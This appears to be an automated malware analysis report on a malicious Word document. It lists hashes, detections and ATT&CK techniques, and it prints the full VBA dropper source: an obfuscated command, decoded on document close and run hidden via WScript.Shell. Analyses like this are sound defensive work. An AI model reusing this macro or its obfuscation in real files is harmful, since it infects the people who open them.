Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ab0f7d145f178f26…

MALICIOUS

Office (OOXML)

Size: 37.0 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-05-10
MD5: 9b6b92395d9cf055dab9b7e66f846ee5
SHA-1: 0bf1aff8aba805b348731ed52b047aa2e0982147
SHA-256: ab0f7d145f178f26444e9c5b1815911131a7f6ba4b41647280320a363e626b1a
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. Heuristics indicate the use of Shell() and WScript.Shell, suggesting the execution of external commands or scripts. The VBA macro 'Document_Close' attempts to decode a long string and pass it to a function that uses WScript.Shell to run it, likely downloading and executing a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6384333-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6384333-0
  • VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 2 related findings)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
      If Len(smarrito) < 4483 Then
        CreateObject("WScript.Shell").Run smarrito, vbHide * 4
      End If
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
      If Len(smarrito) < 4483 Then
        CreateObject("WScript.Shell").Run smarrito, vbHide * 4
      End If
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 13 URLs below carry the same per-URL label: In document text (OOXML body / shared strings).
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • http://schemas.microsoft.com/office/drawing/2010/main

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2523 bytes
SHA-256: 0d6bb12ffcb9577f479b426bb2005b602b3492438787493fcb16b7a3f0c60e0c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function velluto(oblio As Integer) As String
 avviso = Array("+", "N", "'", "T", "e", "y", "C", "i", "t", "o", "r", "c", "/", ".", "F", "O", "L", "x", "=", "-", "q", ")", ";", "m", "g", "w", "s", "p", "l", "n", " ", "a", "(", "d", "\", "S", "?", "D", ":", "h", "B", "j", "v", "$", "W", "A", ",", "X", "u", "E", "b", "P")
 Dim docente As Integer
 
 For docente = LBound(avviso) To UBound(avviso)
   If docente = oblio Then
    velluto = avviso(docente)
   End If
 Next
 
End Function


Public Function decreto(smarrito As String)
  If Len(smarrito) < 4483 Then
    CreateObject("WScript.Shell").Run smarrito, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = ceramica("27092504102639042828301901094917070830194917041130400527312626301906092323312933303201042519155041041108303505260804231301040813440450062807042908211337092529280931331407280432023908082738121220272504094827282323094133310720131109231247161231113113270511024630430429423845515137450345300030023435072850291713041704022122303508311008195110091104262630430429423845515137450345023435072850291713041704022230320104251915504104110830350526080423130104081344045006280704290821133709252928093133350810072924320239080827381212202725040948272823230941333107201311092312261327392736073318311131022122")
 Application.Run "decreto", feralo
End Sub

Function asta(ByVal lacca As String, ByVal clinica As String)
 
pretesto = Array(lacca, clinica)
 zanna = ""
 
 
 For rivincita = 0 To UBound(pretesto)
   zanna = zanna & "" & pretesto(rivincita)
 Next
 
 asta = zanna
End Function

Function ceramica(Optional metallo As String, Optional metallo2)
  drago = spigoloso(Trim(metallo))
  intuito = ""

  For docente = 0 To Len(metallo)
    If (docente + 1) <= UBound(drago) Then
    dote = drago(docente + 1)
    vidimare = drago(docente)
    pedalare = velluto(Int(drago(docente) + dote))
    intuito = asta(intuito, pedalare)
    docente = docente + 1
    End If
  Next
  
  ceramica = intuito
End Function


Function spigoloso(nocivo As String, Optional mastino As Integer) As Variant
    spigoloso = Split(Left(StrConv(nocivo, vbUnicode), Len(StrConv(nocivo, vbUnicode)) - 1), vbNullChar)
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 12800 bytes
SHA-256: 671761b9e9a97ba3687288fa9af12dbc50801f7c01e664429d247f5002fcd71f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).